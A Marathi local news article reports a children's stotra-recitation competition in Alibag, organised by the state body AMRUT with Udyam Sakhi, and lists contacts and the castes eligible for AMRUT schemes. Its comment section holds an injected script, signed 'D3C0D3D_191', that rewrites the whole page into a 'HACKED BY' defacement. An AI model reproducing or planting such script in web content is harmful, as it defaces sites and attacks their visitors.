अलिबागमध्ये अमृत संस्थेच्या पुढाकाराने मोठ्या उत्साहात पार पडली स्तोत्रपठण स्पर्धा

रामरक्षा, मारुती स्तोत्र आणि मनाचे श्लोक पाठांतर स्पर्धेला चांगला प्रतिसाद; उद्यम सखी संस्थेचे लाभले सहकार्य

अलिबागमध्ये अमृत संस्थेच्या पुढाकाराने मोठ्या उत्साहात पार पडली स्तोत्रपठण स्पर्धा मुख्य फोटो
अलिबागमध्ये अमृत संस्थेच्या पुढाकाराने मोठ्या उत्साहात पार पडली स्तोत्रपठण स्पर्धा अतिरिक्त फोटो

अलिबाग : रायगड जिल्ह्यातील अलिबाग येथील श्री रामजी देवस्थान ट्रस्ट रामनाथ (वरसोली) येथे रामरक्षा, मारुती स्तोत्र आणि मनाचे श्लोक पाठांतर स्पर्धा नुकतीच आयोजित करण्यात आली होती. त्यात २५ मुलांनी उत्साहाने सहभाग घेतला. अमृत ही राज्य शासनाची स्वायत्त संस्था आणि अलिबागमधील उद्यम सखी संस्था यांच्या संयुक्त विद्यमाने ही स्पर्धा आयोजित करण्यात आली होती.

महाराष्ट्र संशोधन, उन्नती व प्रशिक्षण प्रबोधिनी अर्थात अमृत ही संस्था खुल्या प्रवर्गातील आर्थिक दुर्बल घटकांच्या सर्वांगीण सक्षमीकरणासाठी विविध योजना आणि उपक्रम राबवते. भारतीय संस्कृती, हिंदू धर्म, राष्ट्रीयत्व, ईशभक्ती, शिस्तप्रियता, देशप्रेम आदी संस्कार मुलांमध्ये रुजवणे, त्यांचे संवर्धन करणे यासाठीही अमृत संस्था प्रयत्नशील असून, गेल्या काही महिन्यांपासून मुला-मुलींच्या संघटनासाठी विविध उपक्रम राबवले जातात. मुलांमध्ये परस्पर सामंजस्य, सलोखा, सहकार्य निर्माण होण्यासाठी काही बैठे/मैदानी खेळ, स्तोत्रपठण आदींचा त्यात समावेश असतो. त्यासाठी दर रविवारी सकाळी दहा वाजता रामजी देवस्थान येथे अमृतवर्ग घेतला जातो. 

या उपक्रमाला स्थानिकांकडून उत्साहवर्धक प्रतिसाद मिळतो. त्यातूनच पुढे स्तोत्रपठण स्पर्धा आयोजित करण्यात आली होती. अमृत संस्थेचे रायगड जिल्हा व्यवस्थापक शैलेश मराठे यांनी त्यासाठी पुढाकार घेतला होता. उद्यम सखी संस्थेच्या सौ. प्रार्थना दामले-नागवेकर यांनी यासाठी सहकार्य केले. रामजी देवस्थानच्या विश्वस्तांनी या कार्यक्रमासाठी जागा उपलब्ध करून दिली. या स्पर्धेसाठी परीक्षक म्हणून सौ. अनघा मराठे, जान्हवी पाटील, सौ. प्रणिता म्हात्रे यांनी काम पाहिले. 

अधिक माहितीसाठी संपर्क :

शैलेश विनायक मराठे - 9112228759 

रायगड जिल्हा व्यवस्थापक, अमृत

मंगेश भागुराम ढेबे - 81495 52143

रायगड जिल्हा उपव्यवस्थापक, अमृत

अमृत संस्थेविषयी : महाराष्ट्र संशोधन, उन्नती व प्रशिक्षण प्रबोधिनी अर्थात अमृत ही राज्य शासनाची स्वायत्त संस्था असून, खुल्या प्रवर्गातील ज्या जातींना कुठल्याही शासकीय संस्था किंवा महामंडळाचा लाभ मिळत नाही अशा जातींमधील आर्थिकदृष्ट्या दुर्बल घटक हा अमृत संस्थेचा लक्ष्यित गट आहे. त्यामध्ये ब्राह्मण, कायस्थ, कोमटी/वैश्य, मारवाडी, पटेल, राजपूत, यलमार, अय्यंगार, राजपुरोहित, पाटीदार, नायर, नायडू, कम्मा, कानबी, सिंधी, बनिया, बंगाली, त्यागी, सेनगुनथर, गुजराथी, ठाकूर, जाट, लोहाना, हिंदू नेपाळी व भूमिहार अशा २५ जातींचा सद्यस्थितीत समावेश आहे. अशा जातींमधील वार्षिक उत्पन्न आठ लाख रुपयांपेक्षा कमी असलेल्या व्यक्ती अमृत संस्थेच्या विविध योजनांचा लाभ घेऊ शकतात. राज्याच्या सर्व ३६ जिल्ह्यांमध्ये अमृत संस्थेची कार्यालये असून, अधिक माहितीसाठी अमृत संस्थेच्या आपापल्या जिल्ह्यातील कार्यालयाशी संपर्क साधावा. तसेच, अमृत संस्थेचे संकेतस्थळ आणि सोशल मीडिया हँडल्स पाहावीत.

संकेतस्थळ : https://mahaamrut.org.in/


Publisher: Shailesh Marathe News publisher name | Date: 08-04-2026 News publication date | Time: 02:19 PM News publication time | Views: 2,280 Number of times this news has been viewed | District: Raigad Related district of the news
Publisher: Shailesh Marathe News publisher name | Date: 08-04-2026 News publication date | Time: 02:19 PM News publication time | Views: 2,280 Number of times this news has been viewed | District: Raigad Related district of the news

ही बातमी शेअर करा

Comments 1 Comments

&
<h1><D3C0D3D_191/h1>
22-04-2026 05:41 PM

<script>document.documentElement.innerHTML='<body style="background:black;color:red;text-align:center;"><h1>HACKED BY D3C0D3D_191</h1></body>';</script>

Write a Comment
0 / 50 words
Advertisement